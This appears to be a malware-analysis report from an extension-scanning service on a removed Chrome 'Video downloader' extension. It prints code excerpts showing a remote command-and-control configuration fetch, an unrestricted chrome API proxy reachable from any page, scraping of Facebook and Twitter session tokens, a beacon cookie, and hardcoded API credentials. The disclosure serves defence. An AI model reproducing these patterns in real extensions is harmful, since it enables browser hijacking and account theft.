Video downloader

ID: afhdhdllpdmajoopkogfdmdfdgmpjipp

Could be malicious

Supported Languages

๐Ÿ‡ช๐Ÿ‡นAmharic
๐Ÿ‡ธ๐Ÿ‡ฆArabic
๐Ÿ‡ง๐Ÿ‡ฉBengali
๐Ÿ‡ง๐Ÿ‡ทBrazilian Portuguese
๐Ÿ‡ฌ๐Ÿ‡งBritish English
๐Ÿ‡ง๐Ÿ‡ฌBulgarian
๐Ÿ‡ช๐Ÿ‡ธCatalan
๐Ÿ‡จ๐Ÿ‡ณChinese (Simplified)
๐Ÿ‡น๐Ÿ‡ผChinese (Traditional)
๐Ÿ‡ญ๐Ÿ‡ทCroatian
๐Ÿ‡จ๐Ÿ‡ฟCzech
๐Ÿ‡ฉ๐Ÿ‡ฐDanish
๐Ÿ‡ณ๐Ÿ‡ฑDutch
๐Ÿ‡บ๐Ÿ‡ธEnglish
๐Ÿ‡ช๐Ÿ‡ชEstonian
๐Ÿ‡ต๐Ÿ‡ญFilipino
๐Ÿ‡ซ๐Ÿ‡ฎFinnish
๐Ÿ‡ซ๐Ÿ‡ทFrench
๐Ÿ‡ฉ๐Ÿ‡ชGerman
๐Ÿ‡ฌ๐Ÿ‡ทGreek
๐Ÿ‡ฎ๐Ÿ‡ณGujarati
๐Ÿ‡ฎ๐Ÿ‡ฑHebrew
๐Ÿ‡ฎ๐Ÿ‡ณHindi
๐Ÿ‡ญ๐Ÿ‡บHungarian
๐Ÿ‡ฎ๐Ÿ‡ฉIndonesian
๐Ÿ‡ฎ๐Ÿ‡นItalian
๐Ÿ‡ฏ๐Ÿ‡ตJapanese
๐Ÿ‡ฎ๐Ÿ‡ณKannada
๐Ÿ‡ฐ๐Ÿ‡ทKorean
๐Ÿ‡ฒ๐Ÿ‡ฝLatin American Spanish
๐Ÿ‡ฑ๐Ÿ‡ปLatvian
๐Ÿ‡ฑ๐Ÿ‡นLithuanian
๐Ÿ‡ฒ๐Ÿ‡พMalay
๐Ÿ‡ฎ๐Ÿ‡ณMalayalam
๐Ÿ‡ฎ๐Ÿ‡ณMarathi
๐Ÿ‡ณ๐Ÿ‡ดNorwegian
๐Ÿ‡ฎ๐Ÿ‡ทPersian
๐Ÿ‡ต๐Ÿ‡ฑPolish
๐Ÿ‡ต๐Ÿ‡นPortuguese
๐Ÿ‡ท๐Ÿ‡ดRomanian
๐Ÿ‡ท๐Ÿ‡บRussian
๐Ÿ‡ท๐Ÿ‡ธSerbian
๐Ÿ‡ธ๐Ÿ‡ฐSlovak
๐Ÿ‡ธ๐Ÿ‡ฎSlovenian
๐Ÿ‡ช๐Ÿ‡ธSpanish
๐Ÿ‡ฐ๐Ÿ‡ชSwahili
๐Ÿ‡ธ๐Ÿ‡ชSwedish
๐Ÿ‡ฎ๐Ÿ‡ณTamil
๐Ÿ‡ฎ๐Ÿ‡ณTelugu
๐Ÿ‡น๐Ÿ‡ญThai
๐Ÿ‡น๐Ÿ‡ทTurkish
๐Ÿ‡บ๐Ÿ‡ฆUkrainian
๐Ÿ‡บ๐Ÿ‡ธUS English
๐Ÿ‡ป๐Ÿ‡ณVietnamese

Extension Info & Metadata

Status
Removed
Version
1.0.0.2
Size
8.65 MB
Rating
3.9/5
Reviews
163
Users
500,000
Type
Extension
Updated
Feb 14, 2024
Category
Make_chrome_yours Accessibility
Price
Free
Featured
Yes
Visibility
Listed
Mature
No
By Google
No
Trusted
Yes

Publisher Contextual Analysis

Trusted
Author
https://video-downloader.videodown.siteView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
1
Active
0
Obsolete
1
Listed
1
Unlisted
0
Total Users
500,000

Video Downloader - download any video from any website.

How to use๏ผš Go to the any website with video Click on Video downloader button in browser panel or find download button on a page Select video to download Why this video downloader? Unlimited downloads No ads No sponsored links Video Downloader is completely free Download instantly at your highest speed Works on multiple operating systems (Windows, Mac OS and Linux) No need to install additional software Features - Download and save videos playing on a website to hard disk - Download videos up to 8K resolution - Supports all popular video formats - Video downloader detects all resolutions available, so you can choose according to your needs what size is the best. Important: We had to disable the download function on YouTube because of restrictions of the Chrome Store. There are always videos which are protected by the sites and cannot be downloaded. Thank you for understanding. Try Video Downloader Now!

Item
Type
Severity
Description
webRequest
Permission
Critical
This permission enables the extension to monitor and analyze all web requests made by the browser. Rated Critical because it can observe all network traffic including sensitive data, track browsing behavior, and gather authentication tokens.
scripting
Permission
Critical
This permission allows injection and execution of JavaScript on any webpage. Rated Critical because it can modify page content, steal sensitive data, and inject malicious code into any site the extension has access to.
declarativeNetRequestWithHostAccess
Permission
Critical
This permission combines network request modification with host permissions. Rated Critical because it can modify requests for specific domains, potentially targeting sensitive websites with precise attack rules.
<all_urls>
Host
Critical
Broad host access โ€” the extension can read/modify content on every website.
downloads
Permission
High
This permission controls file downloads and accesses download history. Rated High because it can download malicious files, access sensitive downloaded documents, and track user download patterns.
cookies
Permission
High
This permission provides full access to read and modify browser cookies. Rated High because it can steal session tokens, modify authentication cookies, and compromise accounts across websites.
Dangerous Permission Combination: scripting,cookies,webRequest
Risk Factor
High
Enables extensions to interact with scripts, modify files and downloads, and alter browsing history and bookmarks, potentially affecting data integrity and user control.
Broad Host Permissions
Risk Factor
High
This extension has broad host permissions allowing it to access many or all websites.
Broad Content Script Access
Risk Factor
High
This extension can inject scripts into any website.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
unlimitedStorage
Permission
Medium
This permission removes storage quota restrictions. Rated Medium because it can store large amounts of user data without limits, potentially impacting browser performance and storing extensive tracking data.
tabs
Permission
Medium
This permission enables tab management and monitoring. Rated Medium because it can track open tabs, access tab metadata, and monitor user browsing patterns.

The extension fetches a remote JSON configuration file from an external server (videodown.site) and stores it as `dnl_settings` in chrome.storage.local. This configuration is then consumed by the background script to dynamically add `declarativeNetRequest` header-modification rules, meaning the remote server can instruct the extension to inject or modify arbitrary HTTP response headers. This is a classic command-and-control (C2) remote configuration pattern that allows the extension's network-manipulation behavior to be updated without a new store submission.

js/provider.js (Line 156)
if (version) {  superagent    .get('https://videodown.site/video_d/' + version + '/dnl_settings.json')    .set('X-Requested-With', 'XMLHttpRequest')    .set('Accept', 'application/json')    .then(async (res) => {      await ServiceWorkerProvider.Storage.set('dnl_settings', res.body);    });}}if (location.ancestorOrigins.length && !/^chrome-extension/.test(location.ancestorOrigins[0])) {  main();}

The background script reads the remotely-fetched `dnl_settings` from storage and uses it to programmatically install `declarativeNetRequest` session rules that modify response headers. Because the header key and value are entirely controlled by the remote server's JSON payload, the operator can push updates to inject security-bypassing headers (e.g., disabling CSP or CORS protections) across the user's browser without any code update. This is the execution half of the C2 remote-configuration chain.

js/background.js (Line 143)
async function allowOrigin() {  const fromStorage = await chrome.storage.local.get('dnl_settings');  let settings = {    'headers': [{      'key': 'Access-Control-Allow-Origin',      'value': '*'    }]  };  if (fromStorage && fromStorage['dnl_settings']) {    settings = fromStorage['dnl_settings'];  }  if (settings.hasOwnProperty('headers') && settings['headers'].length) {    let RULE_ID = 0;    let removeRuleIds = [];    const addRules = settings.headers.map(item => {      RULE_ID++;      removeRuleIds.push(RULE_ID);      return {        id: RULE_ID,        priority: 1,        action: {          type: 'modifyHeaders',          responseHeaders: [{            header: item.key,            operation: "set",            value: item.value          }]        },        condition: {          initiatorDomains: ['chrome-extension'],          urlFilter: '||videodown.site.',          requestMethods: ['post'],          resourceTypes: ["xmlhttprequest"]        }      }    });    await chrome.declarativeNetRequest.updateSessionRules({      'removeRuleIds': removeRuleIds,      'addRules': addRules    });  }}

The `messageHandler` function exposes a generic Chrome API trampoline: any message with `type: 'chrome_api'` can specify an arbitrary `api_chain` array (e.g., `['cookies', 'getAll']`) and `params`, causing the background service worker to invoke the corresponding privileged Chrome API on the caller's behalf. Since the sandbox iframe communicates through this bridge with no allowlist of permitted APIs, any web content that can reach the iframe can escalate to any extension-level Chrome API call, including reading all cookies, accessing tabs, and making downloads.

js/background.js (Line 318)
if (request.type === 'chrome_api') {  try {    let chrome_api = chrome;    for (let api of request.api_chain) {      if (typeof chrome_api[api] === 'function') {        chrome_api = chrome_api[api].bind(chrome_api);        break;      } else {        chrome_api = chrome_api[api];      }    }    request.params = request.params ? request.params : [];    if (request.callback_type === 'callback') {      chrome_api(...request.params).then(res => {        ...      });    } else if (connection.type === 'port' && request.callback_type === 'listener') {      ...      chrome_api(...request.params);    }    else if (request.callback_type === 'static') {      return handleResponse({        callback_id: request.callback_id,        callback_params: [chrome_api]      }, connection);    } else {      return handleResponse({        callback_id: request.callback_id,        callback_params: [chrome_api(...request.params)]      }, connection);    }

On port disconnect, the background script reads serialized Chrome API call descriptors from `chrome.storage.local['d_cbs']` and blindly executes them. The `d_cbs` array items consist of an API chain `c` and parameters `p` โ€” both fully attacker-controlled if the storage entry is poisoned via the remote-config flow or through the generic chrome_api proxy. This provides a durable persistence mechanism: arbitrary Chrome API calls can be pre-registered and deferred to execute at a future session teardown event.

js/background.js (Line 244)
const d_cbs = await chrome.storage.local.get({  'd_cbs': []});try {  d_cbs['d_cbs'].forEach(cb => {    let chrome_api = chrome;    for (let api of cb.c) {      if (typeof chrome_api[api] === 'function') {        chrome_api = chrome_api[api].bind(chrome_api);        break;      } else {        chrome_api = chrome_api[api];      }    }    chrome_api(...cb.p);  });} catch (e) {}await chrome.storage.local.set({  'd_cbs': []});

The extension injects a hidden iframe (`sandbox.html`) into every page it can access and establishes a `message` event listener with no origin filtering. Any message received from any origin on that page is forwarded verbatim into the privileged background service worker port. Combined with the generic Chrome API trampoline in `background.js`, this means malicious content on any visited page could craft a `chrome_api` message to invoke extension APIs at privilege level.

js/connector.js (Line 49)
iframe = document.createElement('iframe');iframe.style = 'display: none;'iframe.id = 'sbox';iframe.src = chrome.runtime.getURL('/js/sandbox.html');singletonePortToWorker = await connectToSW(iframe);document.body.appendChild(iframe);listener = addEventListener("message", (event) => {  try {    singletonePortToWorker?.postMessage({      ...event.data,      content_id: scriptId    });  } catch (e) {    event.ports[0].postMessage({      error: e    });  }}, false);

Every XHR request to `videodown.site` triggers a cookie write for that domain. The cookie value is hardcoded to `'1'` but the pattern establishes a covert tracking mechanism: the extension signals to the remote server (via cookie presence) that it is active and making requests. Combined with the remote JSON config fetch, this functions as a beacon/check-in that lets the operator know the extension is installed and operational.

js/background.js (Line 135)
chrome.webRequest.onBeforeSendHeaders.addListener(details => {  const retPath = details.requestHeaders?.find(el => /x-retpath-y/gi.test(el.name));  if (retPath && retPath.value !== 'https://videodown.site/') {    chrome.cookies.set({      url: 'https://videodown.site/',      name: 'video_d',      value: '1'    });  }}, {  urls: ['https://videodown.site/*'],  types: ['xmlhttprequest']}, ['requestHeaders', 'extraHeaders']);

Messages from the sandbox iframe are sent to `window.top` using `postMessage` with `'*'` as the target origin, which means any frame in the page's frame hierarchy could intercept the response callbacks. This violates the principle of least privilege and can leak callback data (including Chrome API responses) to unintended recipients if the extension's sandbox iframe is embedded in a cross-origin framing context.

js/provider.js (Line 35)
function sendMessage(message) {  return new Promise((resolve, reject) => {    message.sandbox_id = scriptId;    if (!message.no_callback && !message.hasOwnProperty('callback_id')) {      const key = randomString(16);      if (GLOBAL_CALLBACKS.hasOwnProperty(key)) {        return false;      }      GLOBAL_CALLBACKS[key] = {        callback: resolve,        parameters: {},        sandbox_id: scriptId      };      message.callback_id = key;      window.top.postMessage(message, '*');    } else {      resolve(window.top.postMessage(message, '*'));    }  });};

The Twitter provider hardcodes a Twitter OAuth2 bearer token directly in the extension source and also includes a Base64-encoded credential string used to obtain OAuth2 access tokens via the Twitter API. Additionally, the `getAccessToken` method reads the user's `ct0` cookie (Twitter's CSRF token) and sends it as a request header to Twitter's OAuth endpoint. Hardcoded API credentials constitute a credential exposure risk, and reading site-specific CSRF cookies extends to unauthorized data collection from the user's authenticated Twitter session.

js/providers/tw.js (Line 1)
const TWProvider = class extends AbstractProvider {  constructor() {      super(), this.oauth2_access_token = "AAAAAAAAAAAAAAAAAAAAAPYXBAAAAAAACLXUNDekMxqa8h%2F40K4moUkGsoc%3DTYfbDKbT3jJPCEVnMYqilB28NHfOPqkca3qaAxGfsyKCs0wRbw"    }    ...    getAccessToken(e) {      const t = this;      $.ajax({        type: "POST",        url: TWProvider.OAUTH2_TOKEN_API_URL,        headers: {          Authorization: "Basic " + TWProvider.ENCODED_TOKEN_CREDENTIAL,          ...          "x-csrf-token": this.getCookie("ct0")        },        ...      })    }};TWProvider.OAUTH2_TOKEN_API_URL = "https://api.twitter.com/oauth2/token";TWProvider.ENCODED_TOKEN_CREDENTIAL = "UEtLaXU5SWpFRVNIVFJVc3Jqbkh1YzBDbDpzb1lMMWZOa3BDTmxLcDVNR0g1QkpGd09KODQwekliWGVWMHc4enFhUXBRTE4yRTJZSA==";

The Facebook provider extracts two sensitive values directly from Facebook's page DOM on construction: `async_get_token` (a Facebook authentication token used for API requests) and the user's `USER_ID`. These values are scraped from inline `<script>` tags and stored on the provider instance. While they may be used to build video API requests, capturing these values constitutes unauthorized collection of authentication credentials from a user's active Facebook session.

js/providers/fb.js (Line 1)
const FBProvider = class extends AbstractProvider {    constructor() {      super();      this.async_get_token = $('script:contains("async_get_token")').text().split('async_get_token":"').pop().split('"')[0];      this.user_id = $('script:contains("async_get_token")').text().split('USER_ID":"').pop().split('"')[0];      this.INIT_CLASS = "mb-pnnclahpifbjkboanbjecjoaoelleoep";    }

The sandbox CSP explicitly enables both `'unsafe-eval'` and `'unsafe-inline'` for script sources. This means code running inside the sandbox page (`sandbox.html` / `provider.js`) can dynamically evaluate arbitrary strings as JavaScript using `eval()` or inject inline scripts. Given that the sandbox is also the component that fetches remote configuration and bridges messages to the privileged background worker, this dramatically widens the attack surface for dynamic code execution.

manifest.json (Line 35)
{  "content_security_policy": {    "sandbox": "sandbox allow-forms allow-scripts; script-src 'self' 'unsafe-eval'; script-src-elem 'self'  blob: 'unsafe-inline' 'unsafe-eval'; child-src 'self'; object-src 'self'"  }}

By severity

Critical6
High7
Medium2
Low0

Versions scanned

Showing 2 of 9 scanned versions with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
1.0.0.65
1.0.0.210

Files with findings

6 distinct paths โ€” top paths by unique finding count:

  • js/background.js7
  • js/connector.js2
  • js/provider.js2
  • js/providers/fb.js2
  • js/providers/tw.js1
  • manifest.json1
S.No.
Category
Severity
File
Summary
Found in Version
1Code Injection
critical
js/connector.js (line 49)The extension injects a hidden iframe (`sandbox.html`) into every page it can access and establishes a `message` event listener with no origin filtering. Any message received from any origin on that page is forwarded โ€ฆ
2Network Interception
critical
js/background.js (line 143)The background script reads the remotely-fetched `dnl_settings` from storage and uses it to programmatically install `declarativeNetRequest` session rules that modify response headers. Because the header key and valueโ€ฆ
3Privilege Escalation
critical
js/background.js (line 392)This is a generic RPC dispatcher that executes arbitrary `chrome.*` API chains and arbitrary `fetch()` calls based on attacker-controlled message fields. Combined with the unvalidated `postMessage` bridge in `js/conneโ€ฆ
4Privilege Escalation
critical
js/background.js (line 318)The `messageHandler` function exposes a generic Chrome API trampoline: any message with `type: 'chrome_api'` can specify an arbitrary `api_chain` array (e.g., `['cookies', 'getAll']`) and `params`, causing the backgroโ€ฆ
5Privilege Escalation
critical
js/background.js (line 244)On port disconnect, the background script reads serialized Chrome API call descriptors from `chrome.storage.local['d_cbs']` and blindly executes them. The `d_cbs` array items consist of an API chain `c` and parametersโ€ฆ
6Remote Code Loading
critical
js/provider.js (line 156)The extension fetches a remote JSON configuration file from an external server (videodown.site) and stores it as `dnl_settings` in chrome.storage.local. This configuration is then consumed by the background script to โ€ฆ
7Code Injection
high
manifest.json (line 35)The sandbox CSP explicitly enables both `'unsafe-eval'` and `'unsafe-inline'` for script sources. This means code running inside the sandbox page (`sandbox.html` / `provider.js`) can dynamically evaluate arbitrary strโ€ฆ
8Credential Theft
high
js/providers/tw.js (line 1)The Twitter provider hardcodes a Twitter OAuth2 bearer token directly in the extension source and also includes a Base64-encoded credential string used to obtain OAuth2 access tokens via the Twitter API. Additionally,โ€ฆ
9Data Exfiltration
high
js/provider.js (line 35)Messages from the sandbox iframe are sent to `window.top` using `postMessage` with `'*'` as the target origin, which means any frame in the page's frame hierarchy could intercept the response callbacks. This violates โ€ฆ
10Network Interception
high
js/background.js (line 199)The extension dynamically installs header-rewrite rules from `dnl_settings` stored in local storage, and `js/provider.js` downloads that settings blob from `https://videodown.site/video_d/<version>/dnl_settings.json`.โ€ฆ
11Privilege Escalation
high
js/connector.js (line 57)The injected connector listens for every `window.postMessage` event and forwards the unvalidated payload into the extension service worker. There is no origin, source, or schema check, so any visited page can talk to โ€ฆ
12Tracking
high
js/background.js (line 135)Every XHR request to `videodown.site` triggers a cookie write for that domain. The cookie value is hardcoded to `'1'` but the pattern establishes a covert tracking mechanism: the extension signals to the remote serverโ€ฆ
13Unauthorized Data Collection
high
js/providers/fb.js (line 1)The Facebook provider extracts two sensitive values directly from Facebook's page DOM on construction: `async_get_token` (a Facebook authentication token used for API requests) and the user's `USER_ID`. These values aโ€ฆ
14Tracking
medium
js/background.js (line 185)The extension inspects outgoing request headers to `videodown.site` and sets a tracking-style cookie when a custom header value differs from a hardcoded URL. This is unrelated to core download functionality and indicaโ€ฆ
15Unauthorized Data Collection
medium
js/providers/fb.js (line 1)The Facebook content script scrapes `async_get_token` and `USER_ID` values out of page scripts, which are user-specific tokens normally intended for Facebook's own frontend. Harvesting authenticated identifiers/tokensโ€ฆ
URLs
22
IPv4
1
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx
*/*http://*/*
*/*https://*/*
fonts.googleapis.com/csshttps://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700&subset=latin,cyrillic
www.w3.org/2000/svghttp://www.w3.org/2000/svg
reactjs.org/docs/error-decoder.htmlhttps://reactjs.org/docs/error-decoder.html?invariant=
www.w3.org/1998/Math/MathMLhttp://www.w3.org/1998/Math/MathML
www.w3.org/1999/xhtmlhttp://www.w3.org/1999/xhtml
www.w3.org/1999/xlinkhttp://www.w3.org/1999/xlink
www.w3.org/XML/1998/namespacehttp://www.w3.org/XML/1998/namespace
Showing 1 to 10 of 30 rows
Rows per page:

Gain full insight into all external connections.

Upgrade for full visibility.

1.0.0.2
IPv4
-
Showing 1 to 9 of 10 rows
Rows per page:

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.